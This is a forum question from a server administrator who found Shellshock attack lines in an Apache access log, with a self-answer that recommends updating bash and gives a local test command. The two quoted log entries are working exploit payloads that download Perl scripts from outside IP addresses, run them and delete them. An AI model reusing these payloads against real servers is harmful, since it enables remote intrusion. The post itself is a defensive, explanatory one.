# hacking to my apache using cgi script

Tags: apache, cgi

It seems that someone succeeded to hack my apache server.
I have notice in my access.log the following line:

```
81.169.174.52 - - [22/Jan/2015:17:24:39 +0200] "GET /cgi-bin/contact.cgi HTTP/1.1" 200 1531 "-" "() { :;};/usr/     bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://202.191.121.230/ou.pl      -O /tmp/b.pl;curl -O /tmp/b.pl http://202.191.121.230/ou.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"
```

and also this one:

```
80.92.84.168 - - [22/Jan/2015:18:21:08 +0200] "GET /phppath/cgi_wrapper HTTP/1.0" 200 3360 "-" "() { :;};/usr/bin/perl -e 'print      \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESSX\";system(\"wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -     rf /tmp/bot.pl\");'"
```

It seems that they already succeeded to hack, according to HTTP-200.
My questions:

- someone know this issue ?
- how can I configure my apache2.conf to prevent such hacking ?

Thx

Answer (score 0):

Answers to my questions:

Q: someone know this issue ? 
A: This is a Bash Shellshock vulnerability.

Q: how can I configure my apache2.conf to prevent such hacking ?
A: Just update "bash" command(apt-get/yum install...) and exexute the command to test if you still vulnerable: `env x='() { :;}; echo vulnerable' bash -c 'echo hello'`

Thx